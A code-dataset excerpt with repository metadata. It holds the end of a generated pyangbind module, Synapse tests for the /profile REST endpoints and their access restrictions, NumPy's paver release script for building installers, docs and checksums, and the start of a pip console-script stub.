statistics = __builtin__.property(_get_statistics)
mac_addr_withdrawal = __builtin__.property(_get_mac_addr_withdrawal)
mct_enabled = __builtin__.property(_get_mct_enabled)
description = __builtin__.property(_get_description)
outer_vlan_list = __builtin__.property(_get_outer_vlan_list)
_pyangbind_elements = {'bd_id': bd_id, 'vc_id': vc_id, 'active_ac_lif_count': active_ac_lif_count, 'config_ac_lif_count': config_ac_lif_count, 'active_vfi_lif_count': active_vfi_lif_count, 'config_vfi_lif_count': config_vfi_lif_count, 'local_switching': local_switching, 'block_bpdu': block_bpdu, 'bd_type': bd_type, 've_ifindex': ve_ifindex, 've_id': ve_id, 'pw_profile': pw_profile, 'mac_limit': mac_limit, 'statistics': statistics, 'mac_addr_withdrawal': mac_addr_withdrawal, 'mct_enabled': mct_enabled, 'description': description, 'outer_vlan_list': outer_vlan_list, }
| 69.174185 | 796 | 0.748048 |
ace0a3c08d550ff1eae24ed0619cb447c074fc90 | 12,163 | py | Python | tests/rest/client/v1/test_profile.py | DRRDietrich/synapse | bc203c962f4c18bb41b0abf3d3e59957137d6530 | [
"Apache-2.0"
] | 1 | 2020-11-07T03:29:01.000Z | 2020-11-07T03:29:01.000Z | tests/rest/client/v1/test_profile.py | DRRDietrich/synapse | bc203c962f4c18bb41b0abf3d3e59957137d6530 | [
"Apache-2.0"
] | null | null | null | tests/rest/client/v1/test_profile.py | DRRDietrich/synapse | bc203c962f4c18bb41b0abf3d3e59957137d6530 | [
"Apache-2.0"
] | 1 | 2020-09-23T12:36:11.000Z | 2020-09-23T12:36:11.000Z | # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests REST events for /profile paths."""
import json
from mock import Mock
from twisted.internet import defer
import synapse.types
from synapse.api.errors import AuthError, SynapseError
from synapse.rest import admin
from synapse.rest.client.v1 import login, profile, room
from tests import unittest
from ....utils import MockHttpResource, setup_test_homeserver
myid = "@1234ABCD:test"
PATH_PREFIX = "/_matrix/client/r0"
class MockHandlerProfileTestCase(unittest.TestCase):
""" Tests rest layer of profile management.
Todo: move these into ProfileTestCase
"""
@defer.inlineCallbacks
def setUp(self):
self.mock_resource = MockHttpResource(prefix=PATH_PREFIX)
self.mock_handler = Mock(
spec=[
"get_displayname",
"set_displayname",
"get_avatar_url",
"set_avatar_url",
"check_profile_query_allowed",
]
)
self.mock_handler.get_displayname.return_value = defer.succeed(Mock())
self.mock_handler.set_displayname.return_value = defer.succeed(Mock())
self.mock_handler.get_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.set_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.check_profile_query_allowed.return_value = defer.succeed(
Mock()
)
hs = yield setup_test_homeserver(
self.addCleanup,
"test",
http_client=None,
resource_for_client=self.mock_resource,
federation=Mock(),
federation_client=Mock(),
profile_handler=self.mock_handler,
)
async def _get_user_by_req(request=None, allow_guest=False):
return synapse.types.create_requester(myid)
hs.get_auth().get_user_by_req = _get_user_by_req
profile.register_servlets(hs, self.mock_resource)
@defer.inlineCallbacks
def test_get_my_name(self):
mocked_get = self.mock_handler.get_displayname
mocked_get.return_value = defer.succeed("Frank")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % (myid), None
)
self.assertEquals(200, code)
self.assertEquals({"displayname": "Frank"}, response)
self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def test_set_my_name(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.return_value = defer.succeed(())
(code, response) = yield self.mock_resource.trigger(
"PUT", "/profile/%s/displayname" % (myid), b'{"displayname": "Frank Jr."}'
)
self.assertEquals(200, code)
self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][2], "Frank Jr.")
@defer.inlineCallbacks
def test_set_my_name_noauth(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.side_effect = AuthError(400, "message")
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@4567:test"),
b'{"displayname": "Frank Jr."}',
)
self.assertTrue(400 <= code < 499, msg="code %d is in the 4xx range" % (code))
@defer.inlineCallbacks
def test_get_other_name(self):
mocked_get = self.mock_handler.get_displayname
mocked_get.return_value = defer.succeed("Bob")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % ("@opaque:elsewhere"), None
)
self.assertEquals(200, code)
self.assertEquals({"displayname": "Bob"}, response)
@defer.inlineCallbacks
def test_set_other_name(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.side_effect = SynapseError(400, "message")
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@opaque:elsewhere"),
b'{"displayname":"bob"}',
)
self.assertTrue(400 <= code <= 499, msg="code %d is in the 4xx range" % (code))
@defer.inlineCallbacks
def test_get_my_avatar(self):
mocked_get = self.mock_handler.get_avatar_url
mocked_get.return_value = defer.succeed("http://my.server/me.png")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/avatar_url" % (myid), None
)
self.assertEquals(200, code)
self.assertEquals({"avatar_url": "http://my.server/me.png"}, response)
self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def test_set_my_avatar(self):
mocked_set = self.mock_handler.set_avatar_url
mocked_set.return_value = defer.succeed(())
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/avatar_url" % (myid),
b'{"avatar_url": "http://my.server/pic.gif"}',
)
self.assertEquals(200, code)
self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][2], "http://my.server/pic.gif")
class ProfileTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
self.hs = self.setup_test_homeserver()
return self.hs
def prepare(self, reactor, clock, hs):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
def test_set_displayname(self):
request, channel = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test"}),
access_token=self.owner_tok,
)
self.render(request)
self.assertEqual(channel.code, 200, channel.result)
res = self.get_displayname()
self.assertEqual(res, "test")
def test_set_displayname_too_long(self):
"""Attempts to set a stupid displayname should get a 400"""
request, channel = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test" * 100}),
access_token=self.owner_tok,
)
self.render(request)
self.assertEqual(channel.code, 400, channel.result)
res = self.get_displayname()
self.assertEqual(res, "owner")
def get_displayname(self):
request, channel = self.make_request(
"GET", "/profile/%s/displayname" % (self.owner,)
)
self.render(request)
self.assertEqual(channel.code, 200, channel.result)
return channel.json_body["displayname"]
class ProfilesRestrictedTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
room.register_servlets,
]
def make_homeserver(self, reactor, clock):
config = self.default_config()
config["require_auth_for_profile_requests"] = True
config["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(config=config)
return self.hs
def prepare(self, reactor, clock, hs):
# User owning the requested profile.
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
self.profile_url = "/profile/%s" % (self.owner)
# User requesting the profile.
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
self.room_id = self.helper.create_room_as(self.owner, tok=self.owner_tok)
def test_no_auth(self):
self.try_fetch_profile(401)
def test_not_in_shared_room(self):
self.ensure_requester_left_room()
self.try_fetch_profile(403, access_token=self.requester_tok)
def test_in_shared_room(self):
self.ensure_requester_left_room()
self.helper.join(room=self.room_id, user=self.requester, tok=self.requester_tok)
self.try_fetch_profile(200, self.requester_tok)
def try_fetch_profile(self, expected_code, access_token=None):
self.request_profile(expected_code, access_token=access_token)
self.request_profile(
expected_code, url_suffix="/displayname", access_token=access_token
)
self.request_profile(
expected_code, url_suffix="/avatar_url", access_token=access_token
)
def request_profile(self, expected_code, url_suffix="", access_token=None):
request, channel = self.make_request(
"GET", self.profile_url + url_suffix, access_token=access_token
)
self.render(request)
self.assertEqual(channel.code, expected_code, channel.result)
def ensure_requester_left_room(self):
try:
self.helper.leave(
room=self.room_id, user=self.requester, tok=self.requester_tok
)
except AssertionError:
# We don't care whether the leave request didn't return a 200 (e.g.
# if the user isn't already in the room), because we only want to
# make sure the user isn't in the room.
pass
class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
config = self.default_config()
config["require_auth_for_profile_requests"] = True
config["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(config=config)
return self.hs
def prepare(self, reactor, clock, hs):
# User requesting the profile.
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
def test_can_lookup_own_profile(self):
"""Tests that a user can lookup their own profile without having to be in a room
if 'require_auth_for_profile_requests' is set to true in the server's config.
"""
request, channel = self.make_request(
"GET", "/profile/" + self.requester, access_token=self.requester_tok
)
self.render(request)
self.assertEqual(channel.code, 200, channel.result)
request, channel = self.make_request(
"GET",
"/profile/" + self.requester + "/displayname",
access_token=self.requester_tok,
)
self.render(request)
self.assertEqual(channel.code, 200, channel.result)
request, channel = self.make_request(
"GET",
"/profile/" + self.requester + "/avatar_url",
access_token=self.requester_tok,
)
self.render(request)
self.assertEqual(channel.code, 200, channel.result)
| 34.951149 | 88 | 0.649593 |
ace0a5c022fc41425dbd682f1ebb7277ab48afbc | 21,826 | py | Python | pavement.py | Dapid/numpy | aa824670cf6ad21c2f921856ba4eec00781347fe | [
"BSD-3-Clause"
] | null | null | null | pavement.py | Dapid/numpy | aa824670cf6ad21c2f921856ba4eec00781347fe | [
"BSD-3-Clause"
] | null | null | null | pavement.py | Dapid/numpy | aa824670cf6ad21c2f921856ba4eec00781347fe | [
"BSD-3-Clause"
] | null | null | null | """
This paver file is intented to help with the release process as much as
possible. It relies on virtualenv to generate 'bootstrap' environments as
independent from the user system as possible (e.g. to make sure the sphinx doc
is built against the built numpy, not an installed one).
Building a fancy dmg from scratch
=================================
Clone the numpy-macosx-installer git repo from on github into the source tree
(numpy-macosx-installer should be in the same directory as setup.py). Then, do
as follows::
git clone git://github.com/cournape/macosx-numpy-installer
# remove build dir, and everything generated by previous paver calls
# (included generated installers). Use with care !
paver nuke
paver bootstrap && source bootstrap/bin/activate
# Installing numpy is necessary to build the correct documentation (because
# of autodoc)
python setup.py install
paver dmg
Building a simple (no-superpack) windows installer from wine
============================================================
It assumes that blas/lapack are in c:\local\lib inside drive_c.
paver bdist_wininst_simple
You will have to configure your wine python locations (WINE_PYS).
The superpack requires all the atlas libraries for every arch to be installed
(see SITECFG), and can then be built as follows::
paver bdist_superpack
Building changelog + notes
==========================
Assumes you have git and the binaries/tarballs in installers/::
paver write_release
paver write_note
This automatically put the checksum into NOTES.txt, and write the Changelog
which can be uploaded to sourceforge.
TODO
====
- the script is messy, lots of global variables
- make it more easily customizable (through command line args)
- missing targets: install & test, sdist test, debian packaging
- fix bdist_mpkg: we build the same source twice -> how to make sure we use
the same underlying python for egg install in venv and for bdist_mpkg
"""
from __future__ import division, print_function
# What need to be installed to build everything on mac os x:
# - wine: python 2.6 and 2.5 + makensis + cpuid plugin + mingw, all in the PATH
# - paver + virtualenv
# - full texlive
import os
import sys
import shutil
import subprocess
import re
try:
from hashlib import md5
from hashlib import sha256
except ImportError:
from md5 import md5
import paver
from paver.easy import \
options, Bunch, task, call_task, sh, needs, cmdopts, dry
sys.path.insert(0, os.path.dirname(__file__))
try:
setup_py = __import__("setup")
FULLVERSION = setup_py.VERSION
# This is duplicated from setup.py
if os.path.exists('.git'):
GIT_REVISION = setup_py.git_version()
elif os.path.exists('numpy/version.py'):
# must be a source distribution, use existing version file
from numpy.version import git_revision as GIT_REVISION
else:
GIT_REVISION = "Unknown"
if not setup_py.ISRELEASED:
FULLVERSION += '.dev0+' + GIT_REVISION[:7]
finally:
sys.path.pop(0)
#-----------------------------------
# Things to be changed for a release
#-----------------------------------
# Source of the release notes
RELEASE_NOTES = 'doc/release/1.11.0-notes.rst'
# Start/end of the log (from git)
LOG_START = 'v1.10.0b1'
LOG_END = 'master'
#-------------------------------------------------------
# Hardcoded build/install dirs, virtualenv options, etc.
#-------------------------------------------------------
DEFAULT_PYTHON = "2.7"
# Where to put the final installers, as put on sourceforge
SUPERPACK_BUILD = 'build-superpack'
SUPERPACK_BINDIR = os.path.join(SUPERPACK_BUILD, 'binaries')
options(bootstrap=Bunch(bootstrap_dir="bootstrap"),
virtualenv=Bunch(packages_to_install=["sphinx==1.1.3", "numpydoc"],
no_site_packages=False),
sphinx=Bunch(builddir="build", sourcedir="source", docroot='doc'),
superpack=Bunch(builddir="build-superpack"),
installers=Bunch(releasedir="release",
installersdir=os.path.join("release", "installers")),
doc=Bunch(doc_root="doc",
sdir=os.path.join("doc", "source"),
bdir=os.path.join("doc", "build"),
bdir_latex=os.path.join("doc", "build", "latex"),
destdir_pdf=os.path.join("build_doc", "pdf")
),
html=Bunch(builddir=os.path.join("build", "html")),
dmg=Bunch(python_version=DEFAULT_PYTHON),
bdist_wininst_simple=Bunch(python_version=DEFAULT_PYTHON),
)
MPKG_PYTHON = {
"2.6": ["/Library/Frameworks/Python.framework/Versions/2.6/bin/python"],
"2.7": ["/Library/Frameworks/Python.framework/Versions/2.7/bin/python"],
"3.2": ["/Library/Frameworks/Python.framework/Versions/3.2/bin/python3"],
"3.3": ["/Library/Frameworks/Python.framework/Versions/3.3/bin/python3"],
"3.4": ["/Library/Frameworks/Python.framework/Versions/3.4/bin/python3"],
}
SSE3_CFG = {'ATLAS': r'C:\local\lib\atlas\sse3'}
SSE2_CFG = {'ATLAS': r'C:\local\lib\atlas\sse2'}
NOSSE_CFG = {'BLAS': r'C:\local\lib\atlas\nosse', 'LAPACK': r'C:\local\lib\atlas\nosse'}
SITECFG = {"sse2" : SSE2_CFG, "sse3" : SSE3_CFG, "nosse" : NOSSE_CFG}
if sys.platform =="darwin":
WINDOWS_PYTHON = {
"3.4": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python34/python.exe"],
"3.3": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python33/python.exe"],
"3.2": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python32/python.exe"],
"2.7": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe"],
"2.6": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python26/python.exe"],
}
WINDOWS_ENV = os.environ
WINDOWS_ENV["DYLD_FALLBACK_LIBRARY_PATH"] = "/usr/X11/lib:/usr/lib"
MAKENSIS = ["wine", "makensis"]
elif sys.platform == "win32":
WINDOWS_PYTHON = {
"3.4": ["C:\Python34\python.exe"],
"3.3": ["C:\Python33\python.exe"],
"3.2": ["C:\Python32\python.exe"],
"2.7": ["C:\Python27\python.exe"],
"2.6": ["C:\Python26\python.exe"],
}
# XXX: find out which env variable is necessary to avoid the pb with python
# 2.6 and random module when importing tempfile
WINDOWS_ENV = os.environ
MAKENSIS = ["makensis"]
else:
WINDOWS_PYTHON = {
"3.4": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python34/python.exe"],
"3.3": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python33/python.exe"],
"3.2": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python32/python.exe"],
"2.7": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe"],
"2.6": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python26/python.exe"],
}
WINDOWS_ENV = os.environ
MAKENSIS = ["wine", "makensis"]
#-------------------
# Windows installers
#-------------------
def superpack_name(pyver, numver):
"""Return the filename of the superpack installer."""
return 'numpy-%s-win32-superpack-python%s.exe' % (numver, pyver)
def internal_wininst_name(arch):
"""Return the name of the wininst as it will be inside the superpack (i.e.
with the arch encoded."""
ext = '.exe'
return "numpy-%s-%s%s" % (FULLVERSION, arch, ext)
def wininst_name(pyver):
"""Return the name of the installer built by wininst command."""
ext = '.exe'
return "numpy-%s.win32-py%s%s" % (FULLVERSION, pyver, ext)
def prepare_nsis_script(pyver, numver):
if not os.path.exists(SUPERPACK_BUILD):
os.makedirs(SUPERPACK_BUILD)
tpl = os.path.join('tools/win32build/nsis_scripts', 'numpy-superinstaller.nsi.in')
source = open(tpl, 'r')
target = open(os.path.join(SUPERPACK_BUILD, 'numpy-superinstaller.nsi'), 'w')
installer_name = superpack_name(pyver, numver)
cnt = "".join(source.readlines())
cnt = cnt.replace('@NUMPY_INSTALLER_NAME@', installer_name)
for arch in ['nosse', 'sse2', 'sse3']:
cnt = cnt.replace('@%s_BINARY@' % arch.upper(),
internal_wininst_name(arch))
target.write(cnt)
def bdist_wininst_arch(pyver, arch):
"""Arch specific wininst build."""
if os.path.exists("build"):
shutil.rmtree("build")
_bdist_wininst(pyver, SITECFG[arch])
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_superpack(options):
"""Build all arch specific wininst installers."""
pyver = options.python_version
def copy_bdist(arch):
# Copy the wininst in dist into the release directory
source = os.path.join('dist', wininst_name(pyver))
target = os.path.join(SUPERPACK_BINDIR, internal_wininst_name(arch))
if os.path.exists(target):
os.remove(target)
if not os.path.exists(os.path.dirname(target)):
os.makedirs(os.path.dirname(target))
try:
os.rename(source, target)
except OSError:
# When git is installed on OS X but not under Wine, the name of the
# .exe has "-Unknown" in it instead of the correct git revision.
# Try to fix this here:
revidx = source.index(".dev-") + 5
gitrev = source[revidx:revidx+7]
os.rename(source.replace(gitrev, "Unknown"), target)
bdist_wininst_arch(pyver, 'nosse')
copy_bdist("nosse")
bdist_wininst_arch(pyver, 'sse2')
copy_bdist("sse2")
bdist_wininst_arch(pyver, 'sse3')
copy_bdist("sse3")
idirs = options.installers.installersdir
pyver = options.python_version
prepare_nsis_script(pyver, FULLVERSION)
subprocess.check_call(MAKENSIS + ['numpy-superinstaller.nsi'],
cwd=SUPERPACK_BUILD)
# Copy the superpack into installers dir
if not os.path.exists(idirs):
os.makedirs(idirs)
source = os.path.join(SUPERPACK_BUILD, superpack_name(pyver, FULLVERSION))
target = os.path.join(idirs, superpack_name(pyver, FULLVERSION))
shutil.copy(source, target)
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_nosse(options):
"""Build the nosse wininst installer."""
bdist_wininst_arch(options.python_version, 'nosse')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_sse2(options):
"""Build the sse2 wininst installer."""
bdist_wininst_arch(options.python_version, 'sse2')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_sse3(options):
"""Build the sse3 wininst installer."""
bdist_wininst_arch(options.python_version, 'sse3')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_simple():
"""Simple wininst-based installer."""
pyver = options.bdist_wininst_simple.python_version
_bdist_wininst(pyver)
def _bdist_wininst(pyver, cfg_env=None):
cmd = WINDOWS_PYTHON[pyver] + ['setup.py', 'build', '-c', 'mingw32', 'bdist_wininst']
if cfg_env:
for k, v in WINDOWS_ENV.items():
cfg_env[k] = v
else:
cfg_env = WINDOWS_ENV
subprocess.check_call(cmd, env=cfg_env)
#----------------
# Bootstrap stuff
#----------------
@task
def bootstrap(options):
"""create virtualenv in ./bootstrap"""
try:
import virtualenv
except ImportError as e:
raise RuntimeError("virtualenv is needed for bootstrap")
bdir = options.bootstrap_dir
if not os.path.exists(bdir):
os.makedirs(bdir)
bscript = "boostrap.py"
options.virtualenv.script_name = os.path.join(options.bootstrap_dir,
bscript)
options.virtualenv.no_site_packages = False
options.bootstrap.no_site_packages = False
call_task('paver.virtual.bootstrap')
sh('cd %s; %s %s' % (bdir, sys.executable, bscript))
@task
def clean():
"""Remove build, dist, egg-info garbage."""
d = ['build', 'dist', 'numpy.egg-info']
for i in d:
if os.path.exists(i):
shutil.rmtree(i)
bdir = os.path.join('doc', options.sphinx.builddir)
if os.path.exists(bdir):
shutil.rmtree(bdir)
@task
def clean_bootstrap():
bdir = os.path.join(options.bootstrap.bootstrap_dir)
if os.path.exists(bdir):
shutil.rmtree(bdir)
@task
@needs('clean', 'clean_bootstrap')
def nuke(options):
"""Remove everything: build dir, installers, bootstrap dirs, etc..."""
for d in [options.superpack.builddir, options.installers.releasedir]:
if os.path.exists(d):
shutil.rmtree(d)
#---------------------
# Documentation tasks
#---------------------
@task
def html(options):
"""Build numpy documentation and put it into build/docs"""
# Don't use paver html target because of numpy bootstrapping problems
bdir = os.path.join("doc", options.sphinx.builddir, "html")
if os.path.exists(bdir):
shutil.rmtree(bdir)
subprocess.check_call(["make", "html"], cwd="doc")
html_destdir = options.html.builddir
if os.path.exists(html_destdir):
shutil.rmtree(html_destdir)
shutil.copytree(bdir, html_destdir)
@task
def latex():
"""Build numpy documentation in latex format."""
subprocess.check_call(["make", "latex"], cwd="doc")
@task
@needs('latex')
def pdf():
sdir = options.doc.sdir
bdir = options.doc.bdir
bdir_latex = options.doc.bdir_latex
destdir_pdf = options.doc.destdir_pdf
def build_pdf():
subprocess.check_call(["make", "all-pdf"], cwd=str(bdir_latex))
dry("Build pdf doc", build_pdf)
if os.path.exists(destdir_pdf):
shutil.rmtree(destdir_pdf)
os.makedirs(destdir_pdf)
user = os.path.join(bdir_latex, "numpy-user.pdf")
shutil.copy(user, os.path.join(destdir_pdf, "userguide.pdf"))
ref = os.path.join(bdir_latex, "numpy-ref.pdf")
shutil.copy(ref, os.path.join(destdir_pdf, "reference.pdf"))
#------------------
# Mac OS X targets
#------------------
def dmg_name(fullversion, pyver, osxver=None):
"""Return name for dmg installer.
Notes
-----
Python 2.7 has two binaries, one for 10.3 (ppc, i386) and one for 10.6
(i386, x86_64). All other Python versions at python.org at the moment
have binaries for 10.3 only. The "macosx%s" part of the dmg name should
correspond to the python.org naming scheme.
"""
# assume that for the py2.7/osx10.6 build the deployment target is set
# (should be done in the release script).
if not osxver:
osxver = os.environ.get('MACOSX_DEPLOYMENT_TARGET', '10.3')
return "numpy-%s-py%s-python.org-macosx%s.dmg" % (fullversion, pyver,
osxver)
def macosx_version():
if not sys.platform == 'darwin':
raise ValueError("Not darwin ??")
st = subprocess.Popen(["sw_vers"], stdout=subprocess.PIPE)
out = st.stdout.readlines()
ver = re.compile("ProductVersion:\s+([0-9]+)\.([0-9]+)\.([0-9]+)")
for i in out:
m = ver.match(i)
if m:
return m.groups()
def mpkg_name(pyver):
maj, min = macosx_version()[:2]
# Note that bdist_mpkg breaks this if building a dev version with a git
# commit string attached. make_fullplatcomponents() in
# bdist_mpkg/cmd_bdist_mpkg.py replaces '-' with '_', comment this out if
# needed.
return "numpy-%s-py%s-macosx%s.%s.mpkg" % (FULLVERSION, pyver, maj, min)
def _build_mpkg(pyver):
# account for differences between Python 2.7.1 versions from python.org
if os.environ.get('MACOSX_DEPLOYMENT_TARGET', None) == "10.6":
ldflags = "-undefined dynamic_lookup -bundle -arch i386 -arch x86_64 -Wl,-search_paths_first"
else:
ldflags = "-undefined dynamic_lookup -bundle -arch i386 -arch ppc -Wl,-search_paths_first"
ldflags += " -L%s" % os.path.join(os.path.dirname(__file__), "build")
sh("LDFLAGS='%s' %s setup.py bdist_mpkg" % (ldflags, " ".join(MPKG_PYTHON[pyver])))
@task
def simple_dmg():
pyver = "2.6"
src_dir = "dmg-source"
# Clean the source dir
if os.path.exists(src_dir):
shutil.rmtree(src_dir)
os.makedirs(src_dir)
# Build the mpkg
clean()
_build_mpkg(pyver)
# Build the dmg
shutil.copytree(os.path.join("dist", mpkg_name(pyver)),
os.path.join(src_dir, mpkg_name(pyver)))
_create_dmg(pyver, src_dir, "NumPy Universal %s" % FULLVERSION)
@task
def bdist_mpkg(options):
call_task("clean")
try:
pyver = options.bdist_mpkg.python_version
except AttributeError:
pyver = options.python_version
_build_mpkg(pyver)
def _create_dmg(pyver, src_dir, volname=None):
# Build the dmg
image_name = dmg_name(FULLVERSION, pyver)
if os.path.exists(image_name):
os.remove(image_name)
cmd = ["hdiutil", "create", image_name, "-srcdir", src_dir]
if volname:
cmd.extend(["-volname", "'%s'" % volname])
sh(" ".join(cmd))
@task
@cmdopts([("python-version=", "p", "python version")])
def dmg(options):
try:
pyver = options.dmg.python_version
except:
pyver = DEFAULT_PYTHON
idirs = options.installers.installersdir
# Check if docs exist. If not, say so and quit.
ref = os.path.join(options.doc.destdir_pdf, "reference.pdf")
user = os.path.join(options.doc.destdir_pdf, "userguide.pdf")
if (not os.path.exists(ref)) or (not os.path.exists(user)):
import warnings
warnings.warn("Docs need to be built first! Can't find them.")
# Build the mpkg package
call_task("clean")
_build_mpkg(pyver)
macosx_installer_dir = "tools/numpy-macosx-installer"
dmg = os.path.join(macosx_installer_dir, dmg_name(FULLVERSION, pyver))
if os.path.exists(dmg):
os.remove(dmg)
# Clean the image source
content = os.path.join(macosx_installer_dir, 'content')
if os.path.exists(content):
shutil.rmtree(content)
os.makedirs(content)
# Copy mpkg into image source
mpkg_source = os.path.join("dist", mpkg_name(pyver))
mpkg_target = os.path.join(content, "numpy-%s-py%s.mpkg" % (FULLVERSION, pyver))
shutil.copytree(mpkg_source, mpkg_target)
# Copy docs into image source
pdf_docs = os.path.join(content, "Documentation")
if os.path.exists(pdf_docs):
shutil.rmtree(pdf_docs)
os.makedirs(pdf_docs)
shutil.copy(user, os.path.join(pdf_docs, "userguide.pdf"))
shutil.copy(ref, os.path.join(pdf_docs, "reference.pdf"))
# Build the dmg
cmd = ["./new-create-dmg", "--pkgname", os.path.basename(mpkg_target),
"--volname", "numpy", os.path.basename(dmg), "./content"]
st = subprocess.check_call(cmd, cwd=macosx_installer_dir)
source = dmg
target = os.path.join(idirs, os.path.basename(dmg))
if not os.path.exists(os.path.dirname(target)):
os.makedirs(os.path.dirname(target))
shutil.copy(source, target)
#--------------------------
# Source distribution stuff
#--------------------------
def tarball_name(type='gztar'):
root = 'numpy-%s' % FULLVERSION
if type == 'gztar':
return root + '.tar.gz'
elif type == 'zip':
return root + '.zip'
raise ValueError("Unknown type %s" % type)
@task
def sdist(options):
# First clean the repo and update submodules (for up-to-date doc html theme
# and Sphinx extensions)
sh('git clean -xdf')
sh('git submodule init')
sh('git submodule update')
# To be sure to bypass paver when building sdist... paver + numpy.distutils
# do not play well together.
# Cython is run over all Cython files in setup.py, so generated C files
# will be included.
sh('python setup.py sdist --formats=gztar,zip')
# Copy the superpack into installers dir
idirs = options.installers.installersdir
if not os.path.exists(idirs):
os.makedirs(idirs)
for t in ['gztar', 'zip']:
source = os.path.join('dist', tarball_name(t))
target = os.path.join(idirs, tarball_name(t))
shutil.copy(source, target)
def compute_md5(idirs):
released = paver.path.path(idirs).listdir()
checksums = []
for f in sorted(released):
m = md5(open(f, 'r').read())
checksums.append('%s %s' % (m.hexdigest(), os.path.basename(f)))
return checksums
def compute_sha256(idirs):
# better checksum so gpg signed README.txt containing the sums can be used
# to verify the binaries instead of signing all binaries
released = paver.path.path(idirs).listdir()
checksums = []
for f in sorted(released):
m = sha256(open(f, 'r').read())
checksums.append('%s %s' % (m.hexdigest(), os.path.basename(f)))
return checksums
def write_release_task(options, filename='NOTES.txt'):
idirs = options.installers.installersdir
source = paver.path.path(RELEASE_NOTES)
target = paver.path.path(filename)
if target.exists():
target.remove()
source.copy(target)
ftarget = open(str(target), 'a')
ftarget.writelines("""
Checksums
=========
MD5
~~~
""")
ftarget.writelines(['%s\n' % c for c in compute_md5(idirs)])
ftarget.writelines("""
SHA256
~~~~~~
""")
ftarget.writelines(['%s\n' % c for c in compute_sha256(idirs)])
def write_log_task(options, filename='Changelog'):
st = subprocess.Popen(
['git', 'log', '--no-merges', '--use-mailmap',
'%s..%s' % (LOG_START, LOG_END)],
stdout=subprocess.PIPE)
out = st.communicate()[0]
a = open(filename, 'w')
a.writelines(out)
a.close()
@task
def write_release(options):
write_release_task(options)
@task
def write_log(options):
write_log_task(options)
@task
def write_release_and_log(options):
rdir = options.installers.releasedir
write_release_task(options, os.path.join(rdir, 'NOTES.txt'))
write_log_task(options, os.path.join(rdir, 'Changelog'))
| 33.996885 | 101 | 0.642262 |
ace0a7229f2074dc423dff8ca0d1b86b38c30608 | 466 | py | Python | venv/Scripts/pip3-script.py | PaulinaVF/Snake-Search-Algorithms | 94e8b185a2c3464b49614411e848cab2d3e051ec | [
"Apache-2.0"
] | null | null | null | venv/Scripts/pip3-script.py | PaulinaVF/Snake-Search-Algorithms | 94e8b185a2c3464b49614411e848cab2d3e051ec | [
"Apache-2.0"
] | null | null | null | venv/Scripts/pip3-script.py | PaulinaVF/Snake-Search-Algorithms | 94e8b185a2c3464b49614411e848cab2d3e051ec | [
"Apache-2.0"
] | null | null | null | #!"C:\Users\pauli\Desktop\UPAEP\5 SEMESTRE\Artificial Intelligence\Programa\SearchAlgorithms\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
